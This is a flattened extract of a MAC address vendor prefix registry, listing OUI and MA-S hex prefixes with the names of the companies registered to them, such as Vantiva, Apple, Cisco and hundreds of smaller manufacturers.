5C7D7D Vantiva USA LLC 08A7C0 Vantiva USA LLC 8C6A8D Vantiva USA LLC 80D04A Vantiva USA LLC 3CB74B Vantiva USA LLC 98524A Vantiva USA LLC 1C9ECC Vantiva USA LLC 4075C3 Vantiva USA LLC FC9114 Vantiva USA LLC 500959 Vantiva USA LLC BC9B68 Vantiva USA LLC 3817E1 Vantiva USA LLC CC1AA3 Arista Networks B0C287 Vantiva USA LLC 0480A7 ShenZhen TianGang Micro Technology CO.LTD B40AD8 Sony Interactive Entertainment Inc. 389CB2 Apple, Inc. 583653 Apple, Inc. 58A15F Texas Instruments 10CABF Texas Instruments 407912 Texas Instruments 84D328 Apple, Inc. 687909 Cisco Systems, Inc E4A41C Cisco Systems, Inc C8A6EF Samsung Electronics Co.,Ltd 5CE931 TP-Link Corporation Limited E0DF13 Hangzhou Hikvision Digital Technology Co.,Ltd. A42249 Sagemcom Broadband SAS CC934A Sierra Wireless, ULC 00A0D5 Sierra Wireless, ULC 28A331 Sierra Wireless, ULC 00D07C JTEKT ELECTRONICS CORPORATION 886C60 Xiaomi Communications Co Ltd B01886 SmarDTV Corporation 5433C6 Mist Systems, Inc. 14CA56 zte corporation 6C221A AltoBeam Inc. D843AE Micro-Star INTL CO., LTD. 8C1F641D6 ZHEJIANG QIAN INFORMATION & TECHNOLOGIES 8C1F64093 MAG Audio LLC 70B3D56F4 WDI Wise Device Inc. 8C1F648E8 Cominfo, Inc. 70B3D52D7 Private 8C1F6403C Sona Business B.V. 8C1F649E6 MB connect line GmbH Fernwartungssysteme 8C1F64286 i2s 8C1F6459A Primalucelab isrl 8C1F64EE1 PuS GmbH und Co. KG 8C1F64CC2 TOYOGIKEN CO.,LTD. 8C1F64408 techone system 8C1F64BDB Cardinal Scales Manufacturing Co 8C1F64025 SMITEC S.p.A. 8C1F64F24 Albotronic 8C1F64793 Aditec GmbH 8C1F64A31 Zing Communications Inc 8C1F642CD Taiwan Vtron 70B3D523E Tornado Modular Systems 70B3D5A87 Tornado Modular Systems 8C1F64803 MOSCA Elektronik und Antriebstechnik GmbH 70B3D5A33 TIAMA 70B3D5798 TIAMA 8C1F64756 Star Systems International Limited 8C1F6466D VT100 SRL 8C1F64293 Landis+Gyr Equipamentos de Medição Ltda 8C1F64A0D Lumiplan Duhamel 8C1F645E3 Nixer Ltd 8C1F6452E CLOUD TELECOM Inc. 8C1F64154 Flextronics International Kft 8C1F640F4 AW-SOM Technologies LLC 8C1F648E3 UniTik Technology Co., Limited 8C1F6436A INVENTIS S.r.l. 8C1F64AFF Qtechnology A/S 8C1F6477B DB SAS 8C1F64251 Watchdog Systems 8C1F64F84 KST technology 8C1F64BF1 Soha Jin 8C1F64895 Dacom West GmbH 8C1F6437F Scarlet Tech Co., Ltd. 8C1F64DA6 Power Electronics Espana, S.L. 8C1F64593 Brillian Network & Automation Integrated System Co., Ltd. 8C1F64B14 Murata Manufacturing CO., Ltd. 8C1F64744 CHASEO CONNECTOME 8C1F646D0 ABB 8C1F6478F Connection Systems 8C1F64CFA YUYAMA MFG Co.,Ltd 8C1F649A5 Xi‘an Shengxin Science& Technology Development Co.?Ltd. 8C1F645D6 Portrait Displays, Inc. 8C1F6490D Algodue Elettronica Srl 8C1F641D8 Mesomat inc. 8C1F649B2 Emerson Rosemount Analytical 8C1F649E8 GHM Messtechnik GmbH 70B3D56CF Private 8C1F64F2F Quantum Technologies Inc 8C1F64BC3 FoxIoT OÜ 8C1F64B08 Cronus Electronics 8C1F642A1 Pantherun Technologies Pvt Ltd 8C1F64C44 Sypris Electronics 8C1F64676 sdt.net AG 8C1F64117 Grossenbacher Systeme AG 8C1F640D5 RealD, Inc. 8C1F6400C Guan Show Technologe Co., Ltd. 8C1F64462 REO AG 8C1F642FE VERSITRON, Inc. 8C1F64B9E Power Electronics Espana, S.L. 8C1F644F9 Photonic Science and Engineering Ltd 8C1F6497D KSE GmbH 8C1F649A4 LabLogic Systems 8C1F64376 DIAS Infrared GmbH 8C1F6450E Panoramic Power 8C1F644E7 Circuit Solutions 8C1F6417E MI Inc. 8C1F6444E GVA Lighting, Inc. 8C1F649B6 GS Elektromedizinsiche Geräte G. Stemple GmbH 8C1F64556 BAE Systems 8C1F6483E Sicon srl 8C1F647D9 Noisewave Corporation 70B3D511A Mahindra Electric Mobility Limited 70B3D541A HYOSUNG Heavy Industries Corporation 8C1F64C07 HYOSUNG Heavy Industries Corporation 8C1F64208 Sichuan AnSphere Technology Co. Ltd. 8C1F64324 Kinetic Technologies 8C1F6491A Profcon AB 8C1F64CF7 BusPas 8C1F64179 Agrowtek Inc. 8C1F64A51 BABTEL 8C1F64365 VECTOR TECHNOLOGIES, LLC 8C1F64F43 wtec GmbH 8C1F64692 Nexilis Electronics India Pvt Ltd (PICSYS) 8C1F649FF Satelles Inc 8C1F644AE KCS Co., Ltd. 8C1F649F4 Grossenbacher Systeme AG 8C1F64DB7 Lambda Systems Inc. 8C1F642C5 SYSN 8C1F64C35 Peter Huber Kaeltemaschinenbau AG 8C1F64E90 MHE Electronics 8C1F64949 tickIoT Inc. 8C1F641EF Tantronic AG 8C1F64F2C Tunstall A/S 8C1F64A42 Rodgers Instruments US LLC 8C1F64958 Sanchar Telesystems limited 8C1F64C57 Strategic Robotic Systems 8C1F640B0 Bunka Shutter Co., Ltd. 8C1F64316 Potter Electric Signal Company 8C1F648CF Diffraction Limited 8C1F64274 INVIXIUM ACCESS INC 8C1F644D6 Dan Smith LLC 8C1F64622 Logical Product 8C1F64B3B Sicon srl 8C1F6453B REFU Storage System GmbH 8C1F64883 DEUTA-WERKE GmbH 8C1F64059 MB connect line GmbH Fernwartungssysteme 8C1F64703 Calnex Solutions plc 8C1F644E5 Renukas Castle Hard- and Software 8C1F64F27 Tesat-Spacecom GmbH & Co. KG 8C1F64F45 JBF 8C1F64765 Micro Electroninc Products 8C1F64660 LLC NTPC 8C1F64967 DAVE SRL 8C1F64BF0 Newtec A/S 8C1F64775 Becton Dickinson 8C1F64BFB TechArgos 8C1F64C68 FIBERME COMMUNICATIONS LLC 8C1F64855 e.kundenservice Netz GmbH 8C1F64EB5 Meiryo Denshi Corp. 8C1F64FBA Onto Innovation 8C1F6440E Baker Hughes EMEA 8C1F64FF6 Ascon Tecnologic S.r.l. 8C1F6459F Delta Computers LLC. 8C1F642B6 Stercom Power Solutions GmbH 8C1F647D3 Suntech Engineering 8C1F64B7B Gateview Technologies 8C1F6488D Pantherun Technologies Pvt Ltd 8C1F64A5D Shenzhen zhushida Technology lnformation Co.,Ltd 8C1F641AF EnviroNode IoT Solutions 8C1F64C97 Magnet-Physik Dr. Steingroever GmbH 8C1F64099 Pantherun Technologies Pvt Ltd 8C1F64F74 GE AVIC Civil Avionics Systems Company Limited 8C1F64E49 Samwell International Inc 8C1F64FD3 SMILICS TECHNOLOGIES, S.L. 70B3D5FDF NARA CONTROLS INC. 8C1F64111 ISAC SRL 8C1F64E99 Pantherun Technologies Pvt Ltd 8C1F64600 Anhui Chaokun Testing Equipment Co., Ltd 8C1F64103 KRONOTECH SRL 8C1F64647 Senior Group LLC 8C1F647B9 Deviceroy 8C1F64517 Smart Radar System, Inc 8C1F64656 Optotune Switzerland AG 8C1F6416E Benchmark Electronics BV 8C1F6484E West Pharmaceutical Services, Inc. 8C1F64BF4 Fluid Components Intl 8C1F6419B FeedFlo 8C1F64F31 International Water Treatment Maritime AS 8C1F6431A Asiga Pty Ltd 70B3D5226 Yaviar LLC 8C1F64509 Season Electronics Ltd 8C1F64F96 SACO Controls Inc. 8C1F64F25 Misaka Network, Inc. 8C1F64EB2 Aqua Broadcast Ltd 8C1F64CEE DISPLAX S.A. 8C1F64177 Emcom Systems 8C1F64FE3 Power Electronics Espana, S.L. 8C1F6441D Aspen Spectra Sdn Bhd 8C1F649C3 Camozzi Automation SpA 8C1F64E41 Grossenbacher Systeme AG 8C1F642C2 TEX COMPUTER SRL 8C1F64BD7 Union Electronic. 8C1F64B77 Carestream Dental LLC 8C1F64F5A Telco Antennas Pty Ltd 8C1F64A76 DEUTA-WERKE GmbH 8C1F644C1 Clock-O-Matic 8C1F64003 Brighten Controls LLP 8C1F64A38 NuGrid Power 8C1F6457A NPO ECO-INTECH Ltd. 8C1F6408B Shanghai Shenxu Technology Co., Ltd 8C1F64E77 GY-FX SAS 8C1F64DB9 Ermes Elettronica s.r.l. 8C1F64782 ATM LLC 8C1F64CEF Goertek Robotics Co.,Ltd. 8C1F649CE Exi Flow Measurement Ltd 8C1F648AE Shenzhen Qunfang Technology Co., LTD. 70B3D5E76 Dorsett Technologies Inc 8C1F64E52 LcmVeloci ApS 8C1F644CD Guan Show Technologe Co., Ltd. 8C1F64EAA "KB "Modul", LLC 8C1F6415E Dynomotion, Inc 8C1F64C40 Sciospec Scientific Instruments GmbH 8C1F648A9 Guan Show Technologe Co., Ltd. 8C1F64C27 Lift Ventures, Inc 8C1F64CAD General Motors 8C1F6406D Monnit Corporation 8C1F6477C Orange Tree Technologies Ltd 8C1F64F3F Industrial Laser Machines, LLC 8C1F640AB Norbit ODM AS 8C1F64382 Shenzhen ROLSTONE Technology Co., Ltd 8C1F64330 Vision Systems Safety Tech 8C1F643AD TowerIQ 8C1F64EC1 Actronika SAS 8C1F64493 Security Products International, LLC 8C1F647D6 Algodue Elettronica Srl 8C1F647A1 Guardian Controls International Ltd 8C1F640C5 TechnipFMC 8C1F64ACE Rayhaan Networks 8C1F64397 Intel Corporate 8C1F641B6 Red Sensors Limited 8C1F64128 YULISTA INTEGRATED SOLUTION 8C1F64193 Sicon srl 8C1F64984 Abacus Peripherals Pvt Ltd 70B3D56BB LUCEO 8C1F64A5C Prosys 8C1F64572 ZMBIZI APP LLC 8C1F6472C Antai technology Co.,Ltd 8C1F64CE3 Pixel Design & Manufacturing Sdn. Bhd. 8C1F64768 mapna group 8C1F64611 Siemens Industry Software Inc. 8C1F64878 Green Access Ltd 8C1F6428A Arcopie 8C1F64C1F Esys Srl 8C1F64F41 AUTOMATIZACION Y CONECTIVIDAD SA DE CV 8C1F64726 DAVE SRL 8C1F6442B Gamber Johnson-LLC 8C1F64B9A QUERCUS TECHNOLOGIES, S.L. 8C1F647F1 AEM Singapore Pte Ltd 8C1F64460 Solace Systems Inc. 8C1F6421C LLC "EMS-Expert" 70B3D5E41 4neXt S.r.l.s. 70B3D5E27 Woodside Electronics 70B3D5D0B Vendanor AS 70B3D5509 Tinkerforge GmbH 70B3D5036 Vema Venturi AB 70B3D5698 ZIEHL-ABEGG SE 70B3D53B6 MedRx, Inc 70B3D5C19 Zumbach Electronic AG 70B3D5298 Reflexion Medical 70B3D52C6 AM General Contractor 70B3D5685 LDA Audiotech 70B3D5A14 aelettronica group srl 70B3D5EC0 ProtoConvert Pty Ltd 70B3D5BA0 Season Electronics Ltd 70B3D5D13 IRT Technologies 70B3D54E6 Santa Barbara Imaging Systems 70B3D5D6D ACD Elekronik GmbH 70B3D5D45 Vemco Sp. z o. o. 70B3D59FF Network Integrity Systems 70B3D57E6 11811347 CANADA Inc. 70B3D5137 Subject Link Inc 70B3D51FB Crane-elec. Co., LTD. 70B3D58D6 Beijing Xiansheng Technology Co., Ltd 70B3D5736 Jabil 70B3D5D21 biosilver .co.,ltd 70B3D520B KST technology 70B3D533A AudioTEC LLC 70B3D516D BluB0X Security, Inc. 70B3D5E05 Lobaro GmbH 70B3D5B0A Mitsubishi Electric India Pvt. Ltd. 70B3D5B70 Torion Plasma Corporation 70B3D5746 "Smart Systems" LLC 70B3D559F Megger Germany GmbH 70B3D5DA0 Jiangsu Etern Compamy Limited 70B3D5212 Semiconsoft, inc 70B3D50FD JSC "Ural Factories" 70B3D5CE0 M.S. CONTROL 70B3D5265 Rapiot 70B3D570D OMNISENSING PHOTONICS LLC 70B3D563D Topic Embedded Products B.V. 70B3D5DDA Hubbell Power Systems 70B3D56D5 Potter Electric Signal Co. LLC 70B3D5A9F Master Meter Inc. 70B3D51AE EcoG 70B3D5F26 XJ ELECTRIC CO., LTD. 70B3D519D Automata GmbH & Co. KG 70B3D5EE0 Stecomp 70B3D5586 Aliter Technologies 70B3D51C6 Bita-International Co., Ltd. 70B3D5F49 ZMBIZI APP LLC 70B3D5B92 N A Communications LLC 70B3D5919 Thesycon Software Solutions GmbH & Co. KG 70B3D51FA EBZ SysTec GmbH 70B3D55BD nexgenwave 70B3D543A ARKS Enterprises, Inc. 70B3D5399 SPE Smartico, LLC 70B3D5316 Austco Marketing & Service (USA) ltd. 70B3D539F CT Company 70B3D5D04 Plenty Unlimited Inc 70B3D566E SIAME 70B3D59EE Lockheed Martin - THAAD 70B3D5BD7 TT Group SRL 70B3D5A11 TRIOPTICS 70B3D5560 DaiShin Information & Communications Co., Ltd 70B3D5491 VONSCH 70B3D5B4B Network Customizing Technologies Inc 70B3D5256 Telco Antennas Pty Ltd 70B3D5D3E enders GmbH 70B3D5CD8 Nexus Electric S.A. 70B3D51B7 ULSee Inc 70B3D571D Connido Limited 70B3D5BF4 CreevX 70B3D544F Velvac Incorporated 70B3D551F VALEO CDA 70B3D5BDC EDF Lab 70B3D5627 EarTex 70B3D57BD TableConnect GmbH 70B3D57EC Cubic ITS, Inc. dba GRIDSMART Technologies 70B3D523D Circle Consult ApS 70B3D5453 Foerster-Technik GmbH 70B3D5D85 BTG Instruments AB 70B3D58B6 Eldes Ltd 70B3D5423 Harman Connected Services Corporation India Pvt. Ltd. 70B3D5663 Intrinsic Group Limited 70B3D5D5E Barcelona Smart Technologies 70B3D593D Elmeasure India Pvt Ltd 70B3D53A2 Daifuku CO., Ltd. 70B3D59A6 QUNU LABS PRIVATE LIMITED 70B3D57B1 Panamera 70B3D5552 ALTIT.CO.,Ltd. 70B3D5E1D Galaxy Next Generation, Inc. 70B3D5E9F Gigaband IP LLC 70B3D5A1A Nueon - The COR 70B3D53FD NaraControls Inc 70B3D5856 Shanghai Westwell Information and Technology Company Ltd 70B3D599D Opsys-Tech 70B3D593F Vision Sensing Co., Ltd. 70B3D5F41 DUEVI SRL 70B3D5F7F ABL Space Systems 70B3D582B Shangnuo company 70B3D5485 CLARESYS LIMITED 70B3D5F32 Elektronik Art 70B3D5756 TimeMachines Inc. 70B3D53B9 BirdDog Australia 70B3D500F Neusoft Reach Automotive Technology (Shenyang) Co.,Ltd 70B3D5864 BORMANN EDV und Zubehoer 70B3D52AF Enlaps 70B3D5242 Comeo Technology Co.,Ltd 70B3D580C Algra tec AG 70B3D5C0D Clarity Medical Pvt Ltd 70B3D5626 KRONOTECH SRL 70B3D5C48 Weltek Technologies Co. Ltd. 70B3D5E46 7thSense Design Limited 70B3D56F5 Cominfo, Inc. 70B3D5D06 YUYAMA MFG Co.,Ltd 70B3D58D5 Guangzhou Wanglu 70B3D569D JPEmbedded Mazan Filipek Sp. J. 70B3D5051 JT 70B3D50EB Tomahawk Robotics 70B3D5005 CT Company 70B3D56EB QUANTAFLOW 70B3D5632 Power Electronics Espana, S.L. 70B3D5484 Hermann Sewerin GmbH 70B3D5629 OZRAY 70B3D5D99 Nilar AB 70B3D58DD Vertex Co.,Ltd. 70B3D5867 Specialized Communications Corp. 70B3D5F33 Beijing Vizum Technology Co.,Ltd. 70B3D5FD9 eSight 70B3D5687 Volution Group UK 70B3D5393 Monnit Corporation 70B3D5191 Algodue Elettronica Srl 70B3D515A ENABLER LTD. 70B3D562E LINEAGE POWER PVT LTD., 70B3D5872 Nippon Safety co,ltd 70B3D5F46 Season Electronics Ltd 70B3D540D Grupo Epelsa S.L. 70B3D59A8 Egag, LLC 70B3D50BB AnaPico AG 70B3D59CD WEPTECH elektronik GmbH 70B3D51A7 Elk Solutions, LLC 70B3D54F2 COMPAL ELECTRONICS, INC. 70B3D5F3D KAYA Instruments 70B3D5898 Salupo Sas 70B3D53E0 Gogo Business Aviation 70B3D54F3 XPS ELETRONICA LTDA 70B3D5331 Firecom, Inc. 70B3D5E31 NEUROPHET, Inc. 70B3D5C99 Remote Diagnostic Technologies Ltd 70B3D553E Asiga Pty Ltd 70B3D5944 Chromateq 70B3D51CF Dalcnet srl 70B3D5EBF AUTOMATICA Y REGULACION S.A. 70B3D562A DOGA 70B3D5B96 Oculii 70B3D5D9F "Digital Solutions" JSC 70B3D552F R.C. Systems Inc 70B3D58A7 Tucsen Photonics Co., Ltd. 70B3D55AF JENG IoT BV 70B3D5F47 TXMission Ltd. 70B3D5C52 sensorway 70B3D5B1B Technology Link Corporation 70B3D5E72 KDT Corp. 70B3D5980 Beijing Yourong Runda Rechnology Development Co.Ltd. 70B3D5201 Leontech Limited 70B3D5394 Romteck Australia 70B3D5642 MB connect line GmbH Fernwartungssysteme 70B3D5C9A Todd Digital Limited 70B3D5E0A Acouva, Inc. 70B3D5060 RCH Vietnam Limited Liability Company 70B3D5C10 Scanvaegt Systems A/S 70B3D5786 RCH Vietnam Limited Liability Company 70B3D592D Suzhou Wansong Electric Co.,Ltd 70B3D5E97 Toptech Systems, Inc. 70B3D5EF1 Nanotok LLC 70B3D51D6 MacGray Services 70B3D5565 Clecell 70B3D5B95 EPIImaging 70B3D5695 GSP Sprachtechnologie GmbH 70B3D556E Power Electronics Espana, S.L. 70B3D586F LLC "NTC ACTOR" 70B3D5F91 Solid State Disks Ltd 70B3D5D30 Leica Microsystems Ltd. Shanghai 70B3D5082 Sakura Seiki Co.,Ltd. 70B3D5E6F Amazon Technologies Inc. 70B3D5270 Amazon Technologies Inc. 70B3D5221 LX Design House 70B3D5C50 Combilent 70B3D5CA7 i-View Communication Inc. 70B3D5E10 Leidos 70B3D5914 Contec Americas Inc. 70B3D59CF IOTIZE 70B3D568B Sadel S.p.A. 70B3D5971 RCH ITALIA SPA 70B3D59B8 Loma Systems s.r.o. 70B3D540F NEXELEC 70B3D5C9C Connected Response 70B3D5113 iREA System Industry 70B3D5569 Nuance Hearing Ltd. 70B3D589C IHI Rotating Machinery Engineering Co.,Ltd. 70B3D5D3D Netzikon GmbH 70B3D59AC Suzhou Sapa Automotive Technology Co.,Ltd 70B3D5EC5 TATTILE SRL 70B3D595F WiFi Nation Ltd 70B3D5F2F TELEPLATFORMS 70B3D50DD Shenzhen Virtual Clusters Information Technology Co.,Ltd. 70B3D581D DEUTA-WERKE GmbH 70B3D5329 Primalucelab isrl 70B3D5454 Golding Audio Ltd 70B3D5537 Biennebi s.r.l. 70B3D53D0 ORtek Technology, Inc. 70B3D5043 cal4care Pte Ltd 70B3D5BFD Lumentum 70B3D5719 2M Technology 70B3D562F BARCO, s.r.o. 70B3D5356 BRS Sistemas Eletrônicos 70B3D5DCD C TECH BILISIM TEKNOLOJILERI SAN. VE TIC. A.S. 70B3D503A Ochno AB 70B3D5155 Sanwa New Tec Co.,Ltd 70B3D5A0F OSAKI DATATECH CO., LTD. 70B3D5D33 VECTOR.CO.,LTD. 70B3D56A4 Acrodea, Inc. 70B3D5F3E ООО "РОНЕКС" 70B3D59FC Truecom Telesoft Private Limited 70B3D5577 DSILOG 70B3D556F Radikal d.o.o. 70B3D59B0 Clearly IP Inc 70B3D5A34 RCH ITALIA SPA 70B3D5C7A ENTEC Electric & Electronic Co., LTD. 70B3D5667 CT Company 70B3D5A68 Zhejiang Zhaolong Interconnect Technology Co.,Ltd 70B3D5FCE FX TECHNOLOGY LIMITED 70B3D559A Wagner Group GmbH 70B3D5D61 VITEC 70B3D5B2F Hermann Automation GmbH 70B3D5420 ECOINET 70B3D51FC Guan Show Technologe Co., Ltd. 70B3D5588 LLC NPO Svyazkomplektservis 70B3D5171 Aetina Corporation 70B3D534D Equos Research Co., Ltd 70B3D513A DEUTA-WERKE GmbH 70B3D5CD4 Southern Ground Audio LLC 70B3D5CF8 Idneo Technologies S.A.U. 70B3D5ABD wtec GmbH 70B3D52C7 Worldsensing 70B3D5258 BAYKON Endüstriyel Kontrol Sistemleri San. ve Tic. A.Ş. 70B3D53BD DAO QIN TECHNOLOGY CO.LTD. 70B3D557E Ascon Tecnologic S.r.l. 70B3D55E1 Arevita 70B3D5237 Sikom AS 70B3D59DA Blake UK 70B3D5822 Angora Networks 70B3D5A2B Clever Devices 70B3D5151 Virsae Group Ltd 70B3D51F9 Automata GmbH & Co. KG 70B3D5FD5 OCEANCCTV LTD 70B3D550A AMEDTEC Medizintechnik Aue GmbH 70B3D533F XANTIA SA 70B3D521A Acutronic Link Robotics AG 70B3D5490 Xiamen Beogold Technology Co. Ltd. 70B3D59CC Zaxcom Inc 70B3D5E29 Invent Vision - iVision Sistemas de Imagem e Visão S.A. 70B3D5BEE Sicon srl 70B3D5056 MIRAE INFORMATION TECHNOLOGY CO., LTD. 70B3D5754 COSMOIT.CO.LTD 70B3D5E15 Benetel 70B3D51DF ENTEC Electric & Electronic Co., LTD. 70B3D55D4 RCH ITALIA SPA 70B3D566D Sanmina Israel 70B3D598A vision systems safety tech 70B3D5C93 GMI Ltd 70B3D5F3F comtac AG 70B3D5E33 DEUTA-WERKE GmbH 70B3D5497 ALBIRAL DISPLAY SOLUTIONS SL 70B3D5F89 Soehnle Industrial Solutions GmbH 70B3D59A9 PABLO AIR Co., LTD 70B3D5574 Cloud Intelligence Pty Ltd 70B3D5545 Airity Technologies Inc. 70B3D5C24 Elbit Systems of America 70B3D50D0 ProHound Controles Eirelli 70B3D570E Wuhan Xingtuxinke ELectronic Co.,Ltd 70B3D5287 Hypex Electronics BV 70B3D5330 iOne 70B3D5BBA Samriddi Automations Pvt. Ltd. 70B3D5D1A Monnit Corporation 70B3D59A2 O-Net Communications(Shenzhen)Limited 70B3D5752 Guan Show Technologe Co., Ltd. 70B3D5F71 Sonel S.A. 70B3D5E78 Camwell India LLP 70B3D549B Algodue Elettronica Srl 70B3D5ED8 Wartsila Voyage Limited 70B3D5DE5 ASML 70B3D5836 Authenticdata 70B3D5E40 Siemens Mobility GmbH - MO TI SPA 70B3D5FCB Tieline Research Pty Ltd 70B3D5949 National Radio & Telecommunication Corporation - NRTC 70B3D536E Electrónica Falcón S.A.U 70B3D50C7 PEEK TRAFFIC 70B3D54A2 DEVAU Lemppenau GmbH 70B3D58AE FARECO 70B3D507C ISAC SRL 70B3D57AF Hessware GmbH 70B3D59C5 LINEAGE POWER PVT LTD., 70B3D5926 Advice 70B3D5EE8 robert juliat 70B3D50E9 VNT electronics s.r.o. 70B3D508C Airmar Technology Corp 70B3D596E Myostat Motion Control Inc 70B3D501B AUDI AG 70B3D5006 Piranha EMS Inc. 70B3D5A44 FSR, INC. 70B3D52ED Signals and systems india pvt ltd 70B3D5E47 DEUTA-WERKE GmbH 70B3D5CBA YUYAMA MFG Co.,Ltd 70B3D53A0 chiconypower 70B3D5F18 HD Vision Systems GmbH 70B3D54D2 Biotage Sweden AB 70B3D5AA9 Datamars SA 70B3D5D28 Toshiba Electron Tubes & Devices Co., Ltd. 70B3D508B Peter Huber Kaeltemaschinenbau AG 70B3D5CA1 Waldo System 70B3D5008 ESYSE GmbH Embedded Systems Engineering 70B3D527C MOTION LIB,Inc. 70B3D5ACF APG Cash Drawer, LLC 70B3D5793 Gastech Australia Pty Ltd 70B3D5B6B Cambria Corporation 70B3D5BC3 eWireless 70B3D59F9 Fluid Components Intl 70B3D54E0 Microvideo 70B3D5BD8 MB connect line GmbH Fernwartungssysteme 70B3D53D4 Sanmina Israel 70B3D5937 TATTILE SRL 70B3D5334 Dokuen Co. Ltd. 70B3D5EBA Last Mile Gear 70B3D57C7 Sicon srl 70B3D50F7 Bespoon 70B3D5868 U-JIN Mesco Co., Ltd. 70B3D5ED7 WAVE 70B3D511B HoseoTelnet Inc... 70B3D5DD5 Cooltera Limited 70B3D5BC1 Abionic 70B3D515E Season Electronics Ltd 70B3D5471 SYSCO Sicherheitssysteme GmbH 70B3D5ACB TATTILE SRL 70B3D5F70 Honeywell 70B3D5B1F TECNOWATT 70B3D5948 VISION SYSTEMS AURTOMOTIVE (SAFETY TECH) 70B3D5F4D Honeywell 70B3D5E2B Guan Show Technologe Co., Ltd. 70B3D5950 CMT Medical technologies 70B3D5B94 Cygnetic Technologies (Pty) Ltd 70B3D561E PKE Electronics AG 70B3D584C CoreKinect 70B3D52CF MB connect line GmbH Fernwartungssysteme 70B3D50A8 Symetrics Industries d.b.a. Extant Aerospace 70B3D58A5 KST technology 70B3D5862 TripleOre 70B3D5FC8 Moduware PTY LTD 70B3D5A9E Argon ST 70B3D5993 ioThings 70B3D59E3 LG Electronics 70B3D5406 Acrodea, Inc. 70B3D592E Medical Monitoring Center OOD 70B3D5460 Guilin Tryin Technology Co.,Ltd 70B3D567D Acrodea, Inc. 70B3D5D24 Microtronics Engineering GmbH 70B3D5AB3 MICAS AG 70B3D5085 Human Systems Integration 70B3D517B Vistec Electron Beam GmbH 70B3D5CA3 Saankhya Labs Private Limited 70B3D50D1 Common Sense Monitoring Solutions Ltd. 70B3D500A FUJICOM Co.,Ltd. 70B3D5984 Sanmina Israel 70B3D51D3 AIROBOT OÜ 70B3D55ED EA Elektroautomatik GmbH & Co. KG 70B3D5103 HANYOUNG NUX CO.,LTD 70B3D575F Vocality international T/A Cubic 70B3D5C11 Ariston Thermo s.p.a. 70B3D58B4 Scenario Automation 70B3D57AC Verity Studios AG 70B3D53AD CT Company 70B3D5F06 WARECUBE,INC 70B3D5375 Adel System srl 70B3D52C9 SEASON DESIGN TECHNOLOGY 70B3D5D09 Rishaad Brown 70B3D52CA TATTILE SRL 001BC5074 Dynasthetics 70B3D5E0B ENTEC Electric & Electronic Co., LTD. 70B3D53BA Silex Inside 70B3D529C Teko Telecom Srl 70B3D5145 Sicon srl 70B3D58D0 Raft Technologies 70B3D57AD Insitu, Inc 70B3D57C0 TORGOVYY DOM TEHNOLOGIY LLC 70B3D5981 Zamir Recognition Systems Ltd. 70B3D5700 University Of Groningen 70B3D5A90 ERA a.s. 70B3D5D6F X-SPEX GmbH 70B3D57D7 Gedomo GmbH 70B3D5B3B Insitu, Inc 70B3D525D Mimo Networks 70B3D5F7A SENSO2ME 70B3D5AEB Association Romandix 70B3D5BAC AdInte, inc. 70B3D5837 HiDes, Inc. 70B3D59A0 ELDES 70B3D515D Vtron Pty Ltd 70B3D5B18 Abbas, a.s. 70B3D5480 Emergency Lighting Products Limited 70B3D5F8F DIMASTEC GESTAO DE PONTO E ACESSO EIRELI-ME 70B3D5EB5 JUSTEK INC 70B3D595E BLOCKSI LLC 70B3D5EF9 Critical Link LLC 70B3D50A2 TechSigno srl 70B3D5782 thou&tech 70B3D5582 VAGLER International Sdn Bhd 70B3D5BE4 Kunshan excellent Intelligent Technology Co., Ltd. 70B3D5E1B Neuron GmbH 70B3D5A4E Array Technologies Inc. 70B3D5026 Telstra 70B3D50B6 Landis Gyr 70B3D5D54 JL World Corporation Limited 70B3D5A1F GlobalTest LLC 70B3D5741 HOW-E 70B3D5A08 BioBusiness 70B3D5252 Sierra Nevada Corporation 70B3D5716 Lode BV 70B3D561D Telonic Berkeley Inc 70B3D5CAB NOTICE Co., Ltd. 70B3D5D93 PAMIR Inc 70B3D54FC Mettler Toledo 70B3D5D6B Uwinloc 70B3D5B21 TATTILE SRL 70B3D55F3 Rtone 70B3D5608 EIIT SA 70B3D5842 PLUTO Solution co.,ltd. 70B3D569B HORIZON.INC 70B3D516B IOT Engineering 70B3D5EA7 S.I.C.E.S. srl 70B3D53AA RCATSONE 70B3D5031 SHENZHEN GAONA ELECTRONIC CO.LTD 70B3D54B8 International Roll-Call Corporation 70B3D5BA9 Alma 70B3D5C53 S Labs sp. z o.o. 70B3D5EEA Dameca a/s 001BC50B2 SKODA ELECTRIC a.s. 70B3D5E7D Nanjing Dandick Science&technology development co., LTD 70B3D5319 ISO/TC 22/SC 31 70B3D50B2 ndb technologies 70B3D5488 Cardinal Scale Mfg Co 70B3D5DB8 SISTEM SA 70B3D5791 Romteck Australia 70B3D5E5E Critical Link LLC 70B3D5446 Santa Barbara Imaging Systems 70B3D555E BRS Sistemas Eletrônicos 70B3D5A7E QUICCO SOUND Corporation 70B3D57DF RDT Ltd 70B3D5878 Package Guard, Inc 70B3D5408 Comrod AS 70B3D57D2 SDK Kristall 70B3D5A69 Leviathan Solutions Ltd. 70B3D5674 Fortress Cyber Security 70B3D596B FOCAL-JMLab 70B3D5371 BEDEROV GmbH 70B3D5C16 Southern Innovation 70B3D5DB2 Micro Electroninc Products 70B3D5FAD ARC Technology Solutions, LLC 70B3D5DC9 Sensoterra BV 70B3D5E6C Fusar Technologies inc 70B3D5AC7 vivaMOS 70B3D5007 SENSONEO 70B3D530B Ash Technologies 70B3D528C Step Technica Co., Ltd. 70B3D58C1 Rievtech Electronic Co.,Ltd 70B3D5094 Circuitlink Pty Ltd 70B3D5AEF Baumtec GmbH 70B3D5DEE CRDE 70B3D5365 CircuitMeter Inc. 70B3D5442 Blair Companies 70B3D5579 Chelsea Technologies Group Ltd 70B3D5B6A YUYAMA MFG Co.,Ltd 70B3D5585 Nefteavtomatika 70B3D5861 KST technology 70B3D5911 Equatel 70B3D59D0 RJ45 Technologies 70B3D5B56 Power Electronics Espana, S.L. 70B3D5ADF Seraphim Optronics Ltd 70B3D5997 ProTom International 70B3D5B30 Systolé Hardware B.V. 70B3D5672 KLEIBER Infrared GmbH 70B3D5D1C Specialised Imaging Limited 70B3D5135 DORLET SAU 70B3D507A ZAO ZEO 70B3D5AF6 S.C.E. srl 70B3D5A73 MobiPromo 70B3D5637 INEO-SENSE 70B3D5EC8 PANASONIC LIFE SOLUTIONS ELEKTR?K SANAY? VE T?CARE 70B3D581A Joehl & Koeferli AG 70B3D5778 Lumacron Technology Ltd. 70B3D5F05 Motomuto Aps 70B3D5378 synchrotron SOLEIL 70B3D5DFD Contiweb 70B3D59D9 ATX Networks Corp 70B3D5FBD MB connect line GmbH Fernwartungssysteme 70B3D5A8B Giant Power Technology Biomedical Corporation 